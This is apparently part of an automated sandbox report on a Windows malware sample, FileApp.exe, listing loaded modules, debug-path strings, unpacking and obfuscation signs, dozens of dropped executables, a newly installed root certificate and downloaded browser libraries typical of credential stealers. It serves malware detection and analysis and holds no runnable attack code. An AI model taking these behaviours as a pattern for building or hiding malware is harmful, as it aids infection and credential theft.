Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\FileApp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\FileApp.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: FileApp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FileApp.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: FileApp.exe Static file information: File size 9522176 > 1048576
Source: FileApp.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x8b2600
Source: FileApp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: FileApp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdbI source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.PDB source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdb source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb(D source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Windows\exe\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HP.o<C:\Windows\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2563660175.00000000012F9000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Unpacked PE file: 7.2.kPy9KuGWnhtidoY4IdmVbiaT.exe.c60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tmvaidtc:EW;vymybyyn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tmvaidtc:EW;vymybyyn:EW;.taggant:EW;
Binary contains a suspicious time stamp
Source: FileApp.exe Static PE information: 0xE7847BAD [Sat Jan 31 05:48:29 2093 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress, 14_2_00406312
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05812921 pushfd ; retf 0_2_05812A05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00565A60 push ecx; ret 2_2_00565A73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609C711 push es; ret 21_2_0609C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609D413 push es; ret 21_2_0609D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609ECF2 push eax; ret 21_2_0609ED01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041A9F5 push ecx; ret 22_2_0041AA08

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Jump to dropped file
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif Jump to dropped file
Installs new ROOT certificates
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userEHJKFCGHID.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userFBKKJEBFID.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
